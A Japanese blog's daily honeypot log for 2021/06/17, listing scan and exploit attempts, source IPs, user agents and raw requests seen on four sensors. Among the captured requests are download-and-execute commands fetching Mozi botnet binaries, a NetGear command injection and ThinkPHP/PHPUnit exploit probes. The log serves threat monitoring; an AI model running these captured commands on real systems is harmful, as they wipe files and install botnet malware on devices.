コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/06/17 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/06/17分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

/.envへのスキャン行為
Apache Solrへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:US

/.envへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  65.21.189.187/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

D-link製品の脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:60 (前日比:-163)
US:総アクセス数:65 (前日比:-44)
UK:総アクセス数:35 (前日比:-20)
SG:総アクセス数:39 (前日比:-90)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.90.185.180 United States
1 35.173.48.131 United States
1 36.32.3.187 China
1 36.57.173.22 China
1 36.106.167.55 China
1 39.71.165.102 China
1 40.76.50.95 United States
1 40.121.159.159 United States
11 45.146.165.123 Russia
1 47.241.253.80 United States
1 52.156.73.119 United States
2 52.231.204.112 United States
1 60.13.7.129 China
1 60.191.125.35 China
1 63.151.106.126 United States
1 78.56.105.17 Lithuania
1 123.245.25.8 China
7 125.64.94.136 China
1 125.72.95.170 China
2 129.146.9.30 United States
1 132.145.78.163 United States
3 135.125.244.48 France
4 135.125.246.189 France
1 150.255.4.10 China
1 160.177.235.187 Morocco
1 161.97.180.107 Germany
1 163.172.68.26 United Kingdom
1 167.99.137.25 United States
1 178.72.70.244 Russia
1 180.188.249.36 India
1 182.242.236.237 China
1 192.241.208.177 United States
1 192.241.219.147 United States
1 199.19.224.201 United States
1 199.19.225.175 United States
1 221.13.12.162 China
1 221.13.12.191 China

UserAgent一覧

件数 UserAgent
12 -
1 Hello, World
1 Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数 Method Request Protocol
8 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
18 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
4 1.116.223.165 China
1 35.231.11.249 United States
11 45.146.165.123 Russia
1 49.83.201.105 China
21 103.133.104.38 Vietnam
1 134.209.146.158 United States
1 143.198.173.174 United States
3 163.172.168.251 United Kingdom
2 163.172.243.211 United Kingdom
17 164.90.158.5 United States
1 175.202.27.182 South Korea
1 192.241.221.234 United States
1 219.157.29.48 China

UserAgent一覧

件数 UserAgent
3 -
1 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3; rv:52.1.1) Gecko/20100101 Firefox/52.1.1
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
4 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /2015/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2016/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2017/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
2 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 65.21.189.187/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /xmlrpc.php?rsd HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//lisalancaster[.]site/43015a85633a6506c4af8587e35a861e498a19be65c0cf2e2109816c6b29400560dd30413eb8cf908682ac2a77fa0033030b47722fe85dea95ea5bec1dbb3b2f74c61308ef05377438fe668b875b81045c15782cb17889a85b20dc63851e4662 HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.55.52.140 United States
1 35.231.11.249 United States
1 39.84.93.78 China
1 40.112.161.81 United States
11 45.146.165.123 Russia
1 47.253.96.177 United States
1 61.3.146.221 India
1 61.3.151.34 India
1 61.242.40.202 China
1 69.61.242.98 United States
1 78.128.112.18 Bulgaria
1 104.154.217.152 United States
1 134.119.189.155 Germany
1 143.244.167.17 United States
1 148.64.121.254 United States
1 163.172.68.26 United Kingdom
1 178.248.113.89 Germany
1 182.119.162.65 China
1 182.127.112.81 China
1 192.241.215.140 United States
1 192.241.221.78 United States
1 192.241.221.109 United States
1 199.19.224.153 United States
1 199.19.224.201 United States
1 209.141.57.253 United States

UserAgent一覧

件数 UserAgent
8 -
1 Hello, World
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
7 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01
8 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//39[.]84[.]93[.]78:51820/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.90.185.180 United States
4 34.218.70.56 United States
1 40.121.159.159 United States
11 45.146.165.123 Russia
7 47.89.184.109 United States
1 78.128.112.18 Bulgaria
1 103.28.70.137 United States
1 103.139.45.200 Vietnam
1 107.130.226.92 United States
1 107.172.100.248 United States
1 120.85.112.255 China
1 121.46.25.189 China
1 132.145.78.163 United States
1 159.89.113.3 United States
1 163.172.68.26 United Kingdom
1 192.241.215.18 United States
1 192.241.220.73 United States
1 199.19.225.175 United States
1 209.141.57.253 United States
1 212.192.241.87 Czechia

UserAgent一覧

件数 UserAgent
8 -
1 Hello, world
3 Jakarta Commons-HttpClient/3.1
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
2 Mozilla/5.0 zgrab/0.x
1 Wget/1.20.1 (linux-gnu)

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01
2 \x16\x03\x01\x02
6 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /api/4.0/edges HTTP/1.1
1 GET /api/v1/cluster/me HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /mgmt/tm/ltm HTTP/1.1
1 GET /nmaplowercheck1623845787 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 OPTIONS * HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/system_mgr.cgi? HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1